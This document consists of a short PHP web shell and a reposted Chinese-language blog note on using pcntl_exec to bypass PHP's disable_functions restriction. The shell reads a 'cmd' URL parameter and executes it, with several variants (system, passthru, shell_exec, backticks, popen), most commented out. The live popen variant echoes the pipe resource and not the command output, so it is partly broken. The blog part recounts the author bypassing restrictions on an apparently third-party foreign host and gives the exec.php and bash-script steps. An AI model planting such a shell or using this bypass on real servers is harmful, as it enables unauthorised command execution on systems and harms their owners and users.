<?php /* $action = $_GET['cmd']; echo "<pre>"; system($action); echo"<pre/>" */ /* $action = $_GET['cmd']; echo"<pre>"; echo passthru($action); echo"<pre/>"; */ /* $action = $_GET['fuck']; echo"<pre>"; echo shell_exec ($action); echo"<pre/>"; */ /* $action = $_GET['cmd']; echo "<pre>"; echo `$action`; echo "<pre/>"; */ $action = $_GET['cmd']; echo "<pre>"; echo popen($action,'r'); echo "<pre/>"; ?>
轉載:
利用pcntl_exec突破disable_functions
1、說明
pcntl是linux下的一個擴展,可以支持php的多線程操作。
pcntl_exec函數的作用是在當前進程空間執行指定程序,版本要求:PHP > 4.2.0
2、利用
在做滲透的時候被disable_functions卡住不能執行命令是家常便飯,今天在一國外虛擬主機上又被卡了,但我在執行phpinfo();的時候眼前閃過–enable-pcntl。當時我就偷笑了,沒啥好說的,我一直強調滲透要細心做人做事也一樣。
#exec.php <?php pcntl_exec(“/bin/bash”, array(“/tmp/b4dboy.sh”));?> #/tmp/b4dboy.sh #!/bin/bash ls -l /